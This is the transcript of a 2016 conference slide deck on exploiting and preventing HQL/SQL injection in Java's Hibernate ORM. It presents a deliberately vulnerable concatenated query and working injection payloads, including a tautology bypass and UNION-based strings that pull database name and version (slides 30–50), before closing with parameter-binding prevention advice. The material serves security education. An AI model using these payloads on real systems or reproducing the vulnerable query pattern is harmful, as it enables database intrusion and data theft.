Hibernate Blind SQLi MISC 2016

Transcript

1. Exploiting and Preventing SQL Injection in Hibernate

2. Agenda • Introduction • Prior Research • Hibernate Overview •

   HQL Queries • Injection / Exploiting • Blind SQLi • Injection /Exploiting • Prevention • Q + A

3. Introduction • Casey Dunham • Security Consultant for GuidePoint Security

   • Application Security • Code Reviews • Assessments • OWASP Maine • DC207 • TOOOL @CaseyDunham @GuidePointSec

4. • Mikhail Egorov / Sergey Soldatov • ORM2Pwn: Exploiting Injections

   in hibernate ORM • Zeronights 0x05 • New Methods for Exploiting ORM Injections in Java Applications • HITB 2016 (Later this May) Prior Research

5. • Renaud Dubourguais • HQL : Hyperinsane Query Language •

   Safety Symposium on Information and Communication Technologies (SSTIC) 2015

6. Hibernate Overview

7. “Hibernate ORM (Hibernate in short) is an object-relational mapping framework

   for the Java language. It provides a framework for mapping an object-oriented domain model to a relational database.” - Wikipedia

8. “Hibernate's primary feature is mapping from Java classes to database

   tables; and mapping from Java data types to SQL data types.” - Wikipedia
9. None

10. public class Customer { private Long id; private String name;

    private String accountId; public Long getId() { return id; } public void setId(Long id) { this.id = id; } … } id name account_id 1 acme acme_123 2 abc abc_789 3 xyz xyz_3843

11. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

12. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

13. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

14. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

15. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

16. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

17. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

18. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

19. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

20. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

21. @Entity @Table(name=“customer”) public class Customer { @Id @GeneratedValue( strategy=GenerationType.IDENTITY )

    private Long id; @Column( name=“name”, nullable=false ) private String name; @Column( name=“account_id”, nullable=false ) private String accountId; … } id name account_id 1 acme acme_123 2 abc abc_789 3 xyz xyz_3843

22. Exploiting HQL Queries

23. • Similar to SQL • Fully Object Oriented • Uses

    mapped objects and their properties • More limited than SQL Hibernate Query Language

24. from Customer c where c.accountId = ‘acme_123’ Mapped Object Object

    Property Object Alias

25. Can Still Be Vulnerable To Injection public List<Customer> findAllCustomersLike(String query)

    { Session session = getSession(); String hql = "from Customer c where c.name like '%" + query + “%'"; Query q = session.createQuery(hql); return (List<Customer>) q.list(); }

26. Can Still Be Vulnerable To Injection public List<Customer> findAllCustomersLike(String query)

    { Session session = getSession(); String hql = "from Customer c where c.name like '%" + query + “%'"; Query q = session.createQuery(hql); return (List<Customer>) q.list(); }
27. None
28. None

29. Let’s Fix Our Injection String hql = "from Customer c

    where c.name like '%" + query + “%'";

30. Let’s Fix Our Injection String query = "' or 1=1

    or ''='"; String hql = "from Customer c where c.name like '%" + query + “%'";

31. Let’s Fix Our Injection String hql = "from Customer c

    where c.name like '%" + "' or 1=1 or ''='" + "%'";

32. Success!

33. • Enumerate other columns (properties)? • Access other mapped objects?

    So Now What?

34. Screw that and let’s just get to the fun stuff.

35. Blind SQLi

36. HQL Injection SQL Injection

37. Escaping HQL • In HQL the \ is a valid

    character • In HQL to escape a ' we use ‘' • Can combine these to pass along our SQL Injection through HQL
38. None

39. Success! • We can now continue along with a normal

    SQL Injection • But… • SQL needs to be Valid • HQL needs to be Valid as well

40. Here’s where it gets tricky

41. String hql = "from Customer c where c.name like '%"

    + query + "%'"; Injection Here

42. http://localhost/search?q=test

43. q=test' and 1='1

44. None

45. q=test' and '1\''=1 -- '='1

46. q=test' and '1\''=1 union select 1,database(),3-- '='1

47. None

48. q=test' and '1\''=1 union select 1,database(),version()— '='1

49. w00t!

50. select customer0_.id as id1_0_, customer0_.account_id as account_2_0_, customer0_.name as name3_0_

    from customers customer0_ where ( customer0_.name like '%test' ) and '1\''=1 union select 1,database(),version()— '='1%'

51. Prevention

52. Prevention is the same as all SQL Injection

53. Don’t use String Concatenation To Build Queries!!

54. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

55. • Look for calls to • createQuery • createSQLQuery •

    All take HQL strings that could have potential for Injection.

56. Q + A

57. Thank You!

58. @CaseyDunham